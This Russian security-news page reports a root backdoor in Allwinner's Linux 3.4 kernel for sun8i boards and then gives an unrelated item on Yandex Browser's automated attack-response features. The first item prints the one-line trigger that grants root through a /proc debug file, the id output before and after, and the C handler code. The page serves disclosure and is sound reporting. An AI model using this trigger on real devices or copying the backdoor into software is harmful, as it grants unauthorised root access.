Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

Яндекс Браузер для организаций научился сам отбиваться от кибератак

Яндекс продолжает превращать корпоративный браузер из обычного инструмента для работы в полноценный элемент защиты компании. В новой версии Яндекс Браузера для организаций появилась система активной защиты, которая умеет не просто обнаруживать подозрительные действия, а сразу реагировать на них.

Теперь браузер в режиме реального времени анализирует происходящее и, если замечает признаки потенциальной атаки или утечки данных, автоматически выполняет сценарий, заданный администраторами.

Например, если на компьютере сотрудника внезапно запускается программа для удалённого доступа — типичный инструмент, который любят использовать мошенники и злоумышленники, — браузер может мгновенно закрыть доступ к корпоративным веб-ресурсам, очистить локальные браузерные данные и одновременно отправить уведомление специалистам по информационной безопасности. Все это происходит без участия пользователя.

ИТ-администраторы сами определяют, какие события считать подозрительными и какую реакцию запускать. Для каждого триггера можно настроить собственный сценарий — от простой блокировки страницы до автоматического уведомления службы ИБ.

Еще одно нововведение — проверка не только URL, но и IP-адреса сайта. Если сервер, на котором расположен ресурс, замечен в распространении вредоносных программ или другой подозрительной активности, браузер заблокирует загрузку страницы еще до того, как пользователь успеет взаимодействовать с ней. Одновременно информация об инциденте поступит специалистам по безопасности.

По сути, Яндекс делает ставку на проактивную защиту. Вместо того чтобы ждать сигнала от SIEM, антивируса или SOC, браузер сам становится сенсором и способен первым заметить подозрительную активность на рабочем месте сотрудника.

Новые функции уже доступны в расширенной версии Яндекс Браузера для организаций и работают при наличии действующей лицензии.

RSS: Новости на портале Anti-Malware.ru